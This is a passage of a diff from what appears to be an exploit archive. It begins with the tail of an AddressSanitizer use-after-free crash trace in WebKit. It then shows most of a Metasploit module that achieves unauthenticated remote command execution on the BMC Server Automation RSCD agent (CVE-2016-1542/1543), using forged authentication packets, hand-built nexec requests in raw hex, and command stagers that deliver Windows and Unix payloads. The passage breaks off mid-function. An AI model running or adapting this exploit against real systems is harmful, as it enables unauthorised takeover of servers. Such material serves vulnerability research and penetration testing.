+    #30 0x407b3593b in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x285693b)
+    #31 0x407c58857 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2979857)
+    #32 0x407c55200 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2976200)
+    #33 0x407bf580e in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x291680e)
+    #34 0x400c8831b in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xc8831b)
+    #35 0x400c8b66e in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xc8b66e)
+    #36 0x400c8ab6f in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xc8ab6f)
+    #37 0x400377a30 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x377a30)
+    #38 0x40013269e in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x13269e)
+    #39 0x40013c1d6 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x13c1d6)
+    #40 0x4157fb7a7 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f717a7)
+    #41 0x4157fc1b6 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f721b6)
+    #42 0x7fff365b9820 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa3820)
+    #43 0x7fff366734cb in __CFRunLoopDoSource0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x15d4cb)
+    #44 0x7fff3659c2bf in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x862bf)
+    #45 0x7fff3659b73c in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x8573c)
+    #46 0x7fff3659afa2 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x84fa2)
+    #47 0x7fff358ba865 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f865)
+    #48 0x7fff358ba5d5 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f5d5)
+    #49 0x7fff358ba353 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x2f353)
+    #50 0x7fff33bb7a22 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x41a22)
+    #51 0x7fff3434ce6b in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7d6e6b)
+    #52 0x7fff33bac830 in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x36830)
+    #53 0x7fff33b7b9d1 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x59d1)
+    #54 0x7fff5de496c2 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x106c2)
+    #55 0x7fff5de48315 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf315)
+    #56 0x10b9254d6 in main (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x1000014d6)
+    #57 0x7fff5db7d144 in start (/usr/lib/system/libdyld.dylib:x86_64+0x1144)
+
+0x6190000b28c0 is located 320 bytes inside of 1040-byte region [0x6190000b2780,0x6190000b2b90)
+freed by thread T0 here:
+    #0 0x4039d4fa4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59fa4)
+    #1 0x4158554b0 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb4b0)
+    #2 0x4073ae8b2 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20cf8b2)
+    #3 0x4075684fd in WebCore::absolutePointIfNotClipped(WebCore::Document&, WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x22894fd)
+    #4 0x407568188 in WebCore::TreeScope::nodeFromPoint(WebCore::LayoutPoint const&, WebCore::LayoutPoint*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2289188)
+    #5 0x4073b0370 in WebCore::Document::caretRangeFromPoint(WebCore::LayoutPoint const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20d1370)
+    #6 0x4073b01d6 in WebCore::Document::caretRangeFromPoint(int, int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20d11d6)
+    #7 0x405b26710 in WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x847710)
+    #8 0x405aff967 in long long WebCore::IDLOperation<WebCore::JSDocument>::call<&(WebCore::jsDocumentPrototypeFunctionCaretRangeFromPointBody(JSC::ExecState*, WebCore::JSDocument*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState&, char const*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x820967)
+    #9 0x5b6aade01167  (<unknown module>)
+    #10 0x413893068 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9068)
+    #11 0x413893068 in llint_entry (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x9068)
+    #12 0x41388beef in vmEntryToJavaScript (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1eef)
+    #13 0x414ca63e5 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x141c3e5)
+    #14 0x414c29115 in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x139f115)
+    #15 0x41506a549 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x17e0549)
+    #16 0x41506a6db in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x17e06db)
+    #17 0x41506aa81 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x17e0a81)
+    #18 0x406e74498 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1b95498)
+    #19 0x406eb47d6 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext&, WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1bd57d6)
+    #20 0x40748442e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul, WTF::FastMalloc>) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21a542e)
+    #21 0x4074773ee in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x21983ee)
+    #22 0x407cc4c6e in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29e5c6e)
+    #23 0x407cd53ad in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29f63ad)
+    #24 0x4073bb78f in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20dc78f)
+    #25 0x4073b4c90 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20d5c90)
+    #26 0x407b7f2c2 in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a02c2)
+    #27 0x407b7c49c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x289d49c)
+    #28 0x4073d70b2 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x20f80b2)
+    #29 0x407901554 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2622554)
+
+previously allocated by thread T0 here:
+    #0 0x4039d4a3c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/9.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x59a3c)
+    #1 0x7fff5dd25200 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2200)
+    #2 0x415855944 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fcb944)
+    #3 0x415853bdd in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1fc9bdd)
+    #4 0x4157c045b in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3645b)
+    #5 0x4157bf90a in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1f3590a)
+    #6 0x407d494d8 in WTF::RefCounted<WebCore::Widget>::operator new(unsigned long) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a6a4d8)
+    #7 0x407d49439 in WebCore::FrameView::create(WebCore::Frame&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a6a439)
+    #8 0x407d37347 in WebCore::Frame::createView(WebCore::IntSize const&, WebCore::Color const&, bool, WebCore::IntSize const&, WebCore::IntRect const&, bool, WebCore::ScrollbarMode, bool, WebCore::ScrollbarMode, bool) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a58347)
+    #9 0x40088a389 in WebKit::WebFrameLoaderClient::transitionToCommittedForNewPage() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x88a389)
+    #10 0x407b8b7d5 in WebCore::FrameLoader::transitionToCommitted(WebCore::CachedPage*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28ac7d5)
+    #11 0x407b8aa26 in WebCore::FrameLoader::commitProvisionalLoad() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28aba26)
+    #12 0x407b35896 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2856896)
+    #13 0x407b3f45a in WebCore::DocumentLoader::maybeLoadEmpty() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x286045a)
+    #14 0x407b3f776 in WebCore::DocumentLoader::startLoadingMainResource() (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2860776)
+    #15 0x407ba47e5 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL)::$_8::operator()() const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28c57e5)
+    #16 0x407b88219 in WebCore::FrameLoader::continueLoadAfterNavigationPolicy(WebCore::ResourceRequest const&, WebCore::FormState*, bool, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a9219)
+    #17 0x407bc62e3 in WTF::CompletionHandler<void (WebCore::ResourceRequest&&, WebCore::FormState*, bool)>::operator()(WebCore::ResourceRequest&&, WebCore::FormState*, bool) const (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28e72e3)
+    #18 0x407bd22ae in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest&&, bool, WebCore::DocumentLoader*, WebCore::FormState*, WTF::CompletionHandler<void (WebCore::ResourceRequest&&, WebCore::FormState*, bool)>&&)::$_5::operator()(WebCore::PolicyAction) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28f32ae)
+    #19 0x40087250c in WebKit::WebFrame::didReceivePolicyDecision(unsigned long long, WebCore::PolicyAction, unsigned long long, WebKit::DownloadID, WebKit::WebsitePolicies&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x87250c)
+    #20 0x400883ebe in WebKit::WebFrameLoaderClient::dispatchDecidePolicyForNavigationAction(WebCore::NavigationAction const&, WebCore::ResourceRequest const&, bool, WebCore::FormState*, WTF::Function<void (WebCore::PolicyAction)>&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x883ebe)
+    #21 0x407bc5f4b in WebCore::PolicyChecker::checkNavigationPolicy(WebCore::ResourceRequest&&, bool, WebCore::DocumentLoader*, WebCore::FormState*, WTF::CompletionHandler<void (WebCore::ResourceRequest&&, WebCore::FormState*, bool)>&&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28e6f4b)
+    #22 0x407b87725 in WebCore::FrameLoader::loadWithDocumentLoader(WebCore::DocumentLoader*, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a8725)
+    #23 0x407b85f40 in WebCore::FrameLoader::loadWithNavigationAction(WebCore::ResourceRequest const&, WebCore::NavigationAction const&, WebCore::LockHistory, WebCore::FrameLoadType, WebCore::FormState*, WebCore::AllowNavigationToInvalidURL) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a6f40)
+    #24 0x407b822ea in WebCore::FrameLoader::loadURL(WebCore::FrameLoadRequest&&, WTF::String const&, WebCore::FrameLoadType, WebCore::Event*, WebCore::FormState*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a32ea)
+    #25 0x407b80327 in WebCore::FrameLoader::loadURLIntoChildFrame(WebCore::URL const&, WTF::String const&, WebCore::Frame*) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x28a1327)
+    #26 0x40088b299 in WebKit::WebFrameLoaderClient::createFrame(WebCore::URL const&, WTF::String const&, WebCore::HTMLFrameOwnerElement&, WTF::String const&, bool, int, int) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x88b299)
+    #27 0x407be6a97 in WebCore::SubframeLoader::loadSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::String const&, WTF::String const&) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2907a97)
+    #28 0x407be4836 in WebCore::SubframeLoader::loadOrRedirectSubframe(WebCore::HTMLFrameOwnerElement&, WebCore::URL const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2905836)
+    #29 0x407be43ec in WebCore::SubframeLoader::requestFrame(WebCore::HTMLFrameOwnerElement&, WTF::String const&, WTF::AtomicString const&, WebCore::LockHistory, WebCore::LockBackForwardList) (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x29053ec)
+
+SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/WebKit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x52d596) in WTF::Ref<WebCore::Frame>::operator WebCore::Frame&() const
+Shadow bytes around the buggy address:
+  0x1c32000164c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c32000164d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x1c32000164e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
+  0x1c32000164f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c3200016500: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+=>0x1c3200016510: fd fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd
+  0x1c3200016520: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c3200016530: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c3200016540: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c3200016550: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+  0x1c3200016560: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
+Shadow byte legend (one shadow byte represents 8 application bytes):
+  Addressable:           00
+  Partially addressable: 01 02 03 04 05 06 07 
+  Heap left redzone:       fa
+  Freed heap region:       fd
+  Stack left redzone:      f1
+  Stack mid redzone:       f2
+  Stack right redzone:     f3
+  Stack after return:      f5
+  Stack use after scope:   f8
+  Global redzone:          f9
+  Global init order:       f6
+  Poisoned by user:        f7
+  Container overflow:      fc
+  Array cookie:            ac
+  Intra object redzone:    bb
+  ASan internal:           fe
+  Left alloca redzone:     ca
+  Right alloca redzone:    cb
+==35149==ABORTING
+-->

exploits/multiple/remote/43939.rb

@@ -0,0 +1,331 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'            => 'BMC Server Automation RSCD Agent NSH Remote ' \
+                           'Command Execution',
+      'Description'     => %q(
+        This module exploits a weak access control check in the BMC Server
+        Automation RSCD agent that allows arbitrary operating system commands
+        to be executed without authentication.
+        Note: Under Windows, non-powershell commands may need to be prefixed
+              with 'cmd /c'.
+      ),
+      'Author'          =>
+        [
+          'Olga Yanushkevich, ERNW <@yaole0>', # Vulnerability discovery
+          'Nicky Bloor (@NickstaDB) <nick@nickbloor.co.uk>' # RCE payload and Metasploit module
+        ],
+      'References'      =>
+        [
+          ['URL', 'https://insinuator.net/2016/03/bmc-bladelogic-cve-2016-1542-and-cve-2016-1543/'],
+          ['URL', 'https://nickbloor.co.uk/2018/01/01/rce-with-bmc-server-automation/'],
+          ['URL', 'https://nickbloor.co.uk/2018/01/08/improving-the-bmc-rscd-rce-exploit/'],
+          ['CVE', '2016-1542'],
+          ['CVE', '2016-1543']
+        ],
+      'DisclosureDate'  => 'Mar 16 2016',
+      'Privileged'      => false,
+      'Stance'          => Msf::Exploit::Stance::Aggressive,
+      'Platform'        => %w[win linux unix],
+      'Targets'         =>
+        [
+          ['Automatic', {}],
+          [
+            'Windows/VBS Stager', {
+              'Platform' => 'win',
+              'Payload' => { 'Space' => 8100 }
+            }
+          ],
+          [
+            'Unix/Linux', {
+              'Platform' => %w[linux unix],
+              'Payload' => { 'Space' => 32_700 }
+            }
+          ],
+          [
+            'Generic Command', {
+              'Arch' => ARCH_CMD,
+              'Platform' => %w[linux unix win]
+            }
+          ]
+        ],
+      'DefaultTarget'   => 0,
+      'License'         => MSF_LICENSE,
+      'Payload'         => {
+        'BadChars' => "\x00\x09\x0a"
+      },
+      'CmdStagerFlavor' => %w[vbs echo])
+    )
+
+    register_options(
+      [
+        Opt::RPORT(4750)
+      ]
+    )
+
+    deregister_options('SRVHOST', 'SRVPORT', 'SSL', 'SSLCert', 'URIPATH')
+  end
+
+  def check
+    # Send agentinfo request and check result
+    vprint_status('Checking for BMC with agentinfo request.')
+    res = send_agentinfo_request
+
+    # Check for successful platform detection
+    if res[0] == 1
+      vprint_good('BMC RSCD agent detected, platform appears to be ' + res[1])
+      return CheckCode::Detected
+    end
+
+    # Get first four bytes of the packet which should hold the content length
+    res_len = res[1] && res[1].length > 3 ? res[1][0..3].unpack('N')[0] : 0
+
+    # Return unknown if the packet format appears correct (length field check)
+    if res[1] && res[1].length - 4 == res_len
+      vprint_warning('Target appears to be BMC, however an unexpected ' \
+                     'agentinfo response was returned.')
+      vprint_warning('Response: ' + res[1])
+      return CheckCode::Unknown
+    end
+
+    # Invalid response, probably not a BMC RSCD target
+    vprint_error('The target does not appear to be a BMC RSCD agent.')
+    vprint_error('Response: ' + res[1]) if res[1]
+    CheckCode::Safe
+  end
+
+  def exploit
+    # Do auto target selection
+    target_name = target.name
+
+    if target_name == 'Automatic'
+      # Attempt to detect the target platform
+      vprint_status('Detecting remote platform for auto target selection.')
+      platform = send_agentinfo_request
+
+      # Fail if platform detection was unsuccessful
+      if platform[0].zero?
+        fail_with(Failure::UnexpectedReply, 'Unexpected response while ' \
+                  'detecting target platform.')
+      end
+
+      # Set target based on returned platform
+      target_name = if platform[1].downcase.include?('windows')
+                      'Windows/VBS Stager'
+                    else
+                      'Unix/Linux'
+                    end
+    end
+
+    # Exploit based on target
+    vprint_status('Generating and delivering payload.')
+    if target_name == 'Windows/VBS Stager'
+      if payload.raw.start_with?('powershell', 'cmd')
+        execute_command(payload.raw)
+      else
+        execute_cmdstager(flavor: :vbs, linemax: payload.space)
+      end
+      handler
+    elsif target_name == 'Unix/Linux'
+      execute_cmdstager(flavor: :echo, linemax: payload.space)
+      handler
+    elsif target_name == 'Generic Cmd'
+      send_nexec_request(payload.raw, true)
+    end
+  end
+
+  # Execute a command but don't print output
+  def execute_command(command, opts = {})
+    if opts[:flavor] == :vbs
+      if command.start_with?('powershell') == false
+        if command.start_with?('cmd') == false
+          send_nexec_request('cmd /c ' + command, false)
+          return
+        end
+      end
+    end
+    send_nexec_request(command, false)
+  end
+
+  # Connect to the RSCD agent and execute a command via nexec
+  def send_nexec_request(command, show_output)
+    # Connect and auth
+    vprint_status('Connecting to RSCD agent and sending fake auth.')
+    connect_to_rscd
+    send_fake_nexec_auth
+
+    # Generate and send the payload
+    vprint_status('Sending command to execute.')
+    sock.put(generate_cmd_pkt(command))
+
+    # Finish the nexec request
+    sock.put("\x00\x00\x00\x22\x30\x30\x30\x30\x30\x30\x31\x61\x30\x30\x30" \
+             "\x30\x30\x30\x31\x32\x77\x38\x30\x3b\x34\x31\x3b\x33\x39\x30" \
+             "\x35\x38\x3b\x32\x34\x38\x35\x31")
+    sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
+             "\x30\x30\x30\x30\x32\x65\x7f")
+    sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
+             "\x30\x30\x30\x30\x32\x69\x03")
+    sock.put("\x00\x00\x00\x12\x30\x30\x30\x30\x30\x30\x30\x61\x30\x30\x30" \
+             "\x30\x30\x30\x30\x32\x74\x31")
+    sock.put("\x00\x00\x00\x1c\x30\x30\x30\x30\x30\x30\x31\x34\x30\x30\x30" \
+             "\x30\x30\x30\x30\x63\x77\x38\x30\x3b\x34\x31\x3b\x38\x30\x3b" \
+             "\x34\x31")
+    sock.put("\x00\x00\x00\x11\x30\x30\x30\x30\x30\x30\x30\x39\x30\x30\x30" \
+             "\x30\x30\x30\x30\x31\x7a")
+
+    # Get the response from the RSCD agent and disconnect
+    vprint_status('Reading response from RSCD agent.')
+    res = read_cmd_output
+    if show_output == true
+      if res && res[0] == 1
+        print_good("Output\n" + res[1])
+      else
+        print_warning('Command execution failed, the command may not exist.')
+        vprint_warning("Output\n" + res[1])
+      end
+    end
+    disconnect
+  end
+
+  # Attempt to retrieve RSCD agent info and return the platform string
+  def send_agentinfo_request
+    # Connect and send fake auth
+    vprint_status('Connecting to RSCD agent and sending fake auth.')
+    connect_to_rscd
+    send_fake_agentinfo_auth
+
+    # Send agentinfo request, read the response, and disconnect
+    vprint_status('Requesting agent information.')
+    sock.put("\x00\x00\x00\x32\x30\x30\x30\x30\x30\x30\x32\x61\x30\x30\x30" \
+             "\x30\x30\x30\x31\x30\x36\x34\x3b\x30\x3b\x32\x3b\x36\x66\x37" \
+             "\x3b\x38\x38\x30\x3b\x30\x30\x30\x30\x30\x30\x30\x30\x32\x34" \
+             "\x31\x30\x30\x30\x30\x30\x30\x30\x30")
+    res = sock.get_once
+    disconnect
+
+    # Return the platform field from the response if it looks valid
+    res_len = res.length > 3 ? res[0..3].unpack('N')[0] : 0
+    return [1, res.split(';')[4]] if res &&
